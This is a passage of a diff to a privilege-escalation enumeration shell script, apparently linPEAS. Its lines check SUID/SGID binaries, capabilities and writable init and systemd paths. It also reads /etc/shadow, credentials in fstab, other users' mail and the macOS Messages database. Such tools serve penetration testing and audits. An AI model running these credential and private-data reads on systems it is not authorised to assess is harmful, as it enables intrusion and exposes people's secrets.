+fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi - ##-- IF) SUID - print_2title "SUID - Check easy privesc, exploits and write perms" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - if ! [ "$STRINGS" ]; then - echo_not_found "strings" - fi - if ! [ "$STRACE" ]; then - echo_not_found "strace" - fi - suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $suids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total"; then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo $s | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then - printf $ITALIC - echo "----------------------------------------------------------------------------------------" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH - export LD_LIBRARY_PATH="" - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf $NC - export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH - echo "----------------------------------------------------------------------------------------" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - - ##-- IF) SGID - print_2title "SGID" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" - sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) - for s in $sgids_files; do - s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder - if echo "$s" | grep -qE "^total";then break; fi - - sname="$(echo $s | awk '{print $9}')" - if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing - elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then - echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." - timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! [ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. " - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. " - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! -path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! "$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f 